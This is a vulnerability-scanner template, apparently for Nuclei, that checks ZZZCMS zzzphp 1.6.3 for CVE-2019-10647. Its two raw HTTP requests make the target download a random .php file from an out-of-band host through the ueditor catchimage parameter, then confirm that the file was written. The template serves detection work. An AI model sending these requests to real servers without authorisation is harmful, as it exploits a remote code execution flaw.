id: CVE-2019-10647

info:
  name: ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)
  author: Sourabh-Sahu
  severity: critical
  description: |
    ZZZCMS zzzphp v1.6.3 contains a remote code execution caused by lack of restrictions in inc/zzz_file.php, letting attackers execute arbitrary PHP code via a crafted URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter, exploit requires attacker to send malicious URL and server to serve PHP code as plain text.
  impact: |
    Attackers can execute arbitrary PHP code on the server, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of ZZZCMS or apply security patches that restrict PHP file handling in inc/zzz_file.php.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-10647
    - https://github.com/kyrie403/Vuln/blob/master/zzzcms/zzzphp%20v1.6.3%20write%20file%20with%20dangerous%20type.md
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-10647
    cwe-id: CWE-434
    epss-score: 0.61672
    epss-percentile: 0.98357
    cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: zzzcms
    product: zzzphp
  tags: cve,cve2019,rce,zzzphp,intrusive,file-upload,vuln,zzzcms,oast,oob,vkev

flow: http(1) && http(2)

variables:
  file: "{{randstr}}.php"

http:
  - raw:
      - |
        POST /plugins/ueditor/php/controller.php?action=catchimage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        source[]=http://{{interactsh-url}}/{{file}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains_all(body, "SUCCESS","state")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: filename
        regex:
          - '"title":"([^"]+)"'
        internal: true

  - raw:
      - |
        GET /upload/{{filename}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: status
        status:
          - 200
# digest: 490a004630440220242441f4b4057d9ccfe5d46425af86c17af6e908cf9d5d20869bb7aee7751a6902206c1eb3bbd8372832b297df9aff60c05c58514f61f9156416466c598af07c2bee:922c64590222798bb761d5b6d8e72950